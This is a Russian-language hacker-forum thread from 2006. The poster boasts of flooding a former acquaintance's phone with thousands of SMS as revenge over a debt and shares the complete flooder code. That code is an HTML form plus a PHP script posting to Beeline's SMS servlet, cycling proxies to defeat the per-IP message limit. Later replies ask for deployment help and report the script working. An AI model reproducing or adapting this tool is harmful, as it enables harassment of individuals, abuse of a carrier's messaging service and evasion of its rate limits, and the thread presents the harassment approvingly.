Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
10.10.2006, 10:41
|
|
Новичок
Регистрация: 30.04.2005
Сообщений: 22
Провел на форуме:
63195
Репутация:
34
|
|
Как я зафлудил билайн
Однажды мой знакомый киданул меня на 300$. Я довольно не плохо знал этого человека. Знал его имя, город в котором он живёт и номер его мобильника. Конечно ехать и убивать его за 9 тысячь рублей я не стал =) Но зато решил поглумиться и зафлудить его мобилу смсками. Все наверное знают, что с сайтов операторов можно отправлять смс сообщения - этим я и решил воспользоваться. Через минуту я узнал, что оператор кидалы довольно популярный билайн, который я и сам юзаю =). Потопал я на сайт билайна и нашел там форму отправки смс. И тут облом. Картинка защиты. Обойти методом подмены её не получилось, а о расспознание я и не думал, уж очень навороченая картинка для меня. Тогда я начал тупо ходить по сайту билайна, с каждой секундой всё сильнее признавая своё поражение. Тут я наткнулся на прогу, с помощью, которой как увиряют разработчики можно отсылать смс сообщения прямо с домашнего компьютера. Интересно, надо скачать подумал я. Скачал-поставил. Ага, работает. Ну и?! И тут я вдруг понял, что в этой программе нет никаких картинок защиты, в отличие от формы на сайте. Ну и раз программа отправляет смс сообщения без ввода кодов на картинке защиты значет и я могу. Я проснифил весь исходящий трафик от этой проги netsnifer'ом и увидел обычные http запросы. Через минуту был написан простенкий скрипт для флуда моего недруга. А еще через мгновение его телефон был закидан тысячями сообщений. Такая вот веселая история, не дай Бог никому =).
Ах да, сам код флудера. Чуть не забыл =)
INDEX.HTML :
Код:
<html>
<center>
<form name="tele2" action="send.php" method="POST">
<h3>Phone</h3><br>
<input name="phone" value="" type="text" size="14" maxlength="12"><br>
<h3>Count of messages</h3><br>
<input name="count" value="10" type="text" size="14" maxlength="12"><br>
<h3>Message text</h3><br>
<textarea name="message" rows="5" cols="40"></textarea><br>
<input name="submit" type="submit" value="Start spam">
</center>
</html>
Код:
<?
ini_set("error_log",'errors.txt');
ini_set("log_errors",'1');
echo '<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">';
set_time_limit(0);
$log=fopen("log.txt","w+");
$proxy="";
$proxycount=0;
$proxyf=file("proxy.txt");
function setproxy(){
global $proxy;
global $proxycount;
global $proxyf;
if (count($proxyf)==0) die;
if ($proxycount==count($proxyf))
{
{$proxy=$proxyf[0];$proxycount=0;exit;}
}
$proxy=trim($proxyf[$proxycount]);
$proxycount=$proxycount+1;
printandlog("Set proxy - ".$proxy);
}
function printandlog($text){
global $log;
fputs($log,$text."\r\n");
echo $text.'<br>';
flush();
}
function send($num,$message){
global $proxy;
//$message=urlencode($message);
$cr=curl_init("http://www.beonline.ru/servlet/send/sms/");
curl_setopt($cr, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)");
curl_setopt($cr, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);
curl_setopt($cr, CURLOPT_TIMEOUT, 20);
curl_setopt($cr, CURLOPT_HEADER, 1);
curl_setopt($cr, CURLOPT_POSTFIELDS, "phone=".$num."&number_sms=number_sms_send&prf=7909&termtype=G&message=".$message."&translit=&x=5&y=4");
curl_setopt($cr, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($cr, CURLOPT_REFERER, "http://BeeOnLine-Express");
curl_setopt($cr,CURLOPT_PROXY,$proxy);
$r = curl_exec($cr);
if (curl_error($cr))
{
return 'connection_error';
curl_close($cr);
exit;
}
curl_close($cr);
echo $r;
if (StrPos($r,"с данного IP-адреса")<>false) return "notsend";else
return "send";
}
if (!isset($_POST["phone"])) die;
if (!isset($_POST["count"])) die;
if (!isset($_POST["message"])) die;
printandlog("Spam start");
printandlog("Found ".count($proxyf)." proxy");
for ($i=1;$i<=$_POST["count"];$i++)
{
while(1==1)
{
$tem=send(trim($_POST["phone"]),$message);
if ($tem<>"send") setproxy(); else break;
}
printandlog($i." - Send");
}
printandlog("All message send ok");
?>
Кому надо разберётся, что тут да как  |
|
|
10.10.2006, 14:11
|
|
Познающий
Регистрация: 06.10.2006
Сообщений: 59
Провел на форуме:
148279
Репутация:
9
|
|
Чувак, а как насчёт того что там такая хрень - типа всего 12 СМС с одного IP в день!
Ты что и это тоже обошёл? Ты не гонишь? У меня на сайте такая форма есть http://faraon2005ramses.narod.ru/sms.html
Это та же система как на сайте билайна, только без всяких "введите число на картинке"
Что на это скажешь?
|
|
|
|
10.10.2006, 14:16
|
|
Новичок
Регистрация: 30.04.2005
Сообщений: 22
Провел на форуме:
63195
Репутация:
34
|
|
Глянул на твою форму :
"Внимание!!! Количество отправляемых сообщений с одного Ip-адреса в сутки ограничено.". В моём примере юзаются прокси и это тоже обходится...
|
|
|
|
16.10.2006, 14:35
|
|
Познавший АНТИЧАТ
Регистрация: 19.07.2005
Сообщений: 1,000
Провел на форуме:
5868159
Репутация:
950
|
|
Кто нить поставил себе? Если да то дайде пожалуйста ссылку.
|
|
|
|
16.10.2006, 16:15
|
|
Отец порядка
Регистрация: 04.03.2005
Сообщений: 1,007
Провел на форуме:
1204641
Репутация:
412
|
|
ага. чтоб ты запользовал, а чела потом завалили?
тебе дали код-пользуй
====
ps подпись у тебя лажовая
|
|
|
|
16.10.2006, 17:33
|
|
Познавший АНТИЧАТ
Регистрация: 19.07.2005
Сообщений: 1,000
Провел на форуме:
5868159
Репутация:
950
|
|
Вот моя ссылка тока че-то это фигня нифига непашет.
у меня 8000 прокси.
Последний раз редактировалось cardons; 18.04.2008 в 15:54..
|
|
|
|
24.10.2006, 18:32
|
|
Познавший АНТИЧАТ
Регистрация: 19.07.2005
Сообщений: 1,000
Провел на форуме:
5868159
Репутация:
950
|
|
Может кто нить скажет почему непашет?
|
|
|
|
24.10.2006, 19:02
|
|
Постоянный
Регистрация: 22.04.2006
Сообщений: 566
Провел на форуме:
1325772
Репутация:
517
|
|
на бесплатном ХОЛМовском хостинге (h**) залочены внешние запросы в пшп - вот скрипт и не пашет
|
|
|
|
24.10.2006, 19:34
|
|
Постоянный
Регистрация: 29.08.2006
Сообщений: 752
Провел на форуме:
2051507
Репутация:
1178
|
|
Юзай мозги и платный хостинг.... У меня работает (с доработкой небольшой)
|
|
|
|
18.11.2006, 00:39
|
|
Познавший АНТИЧАТ
Регистрация: 19.07.2005
Сообщений: 1,000
Провел на форуме:
5868159
Репутация:
950
|
|
Я непойму в каком формате туда вбивать номер для отправки.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
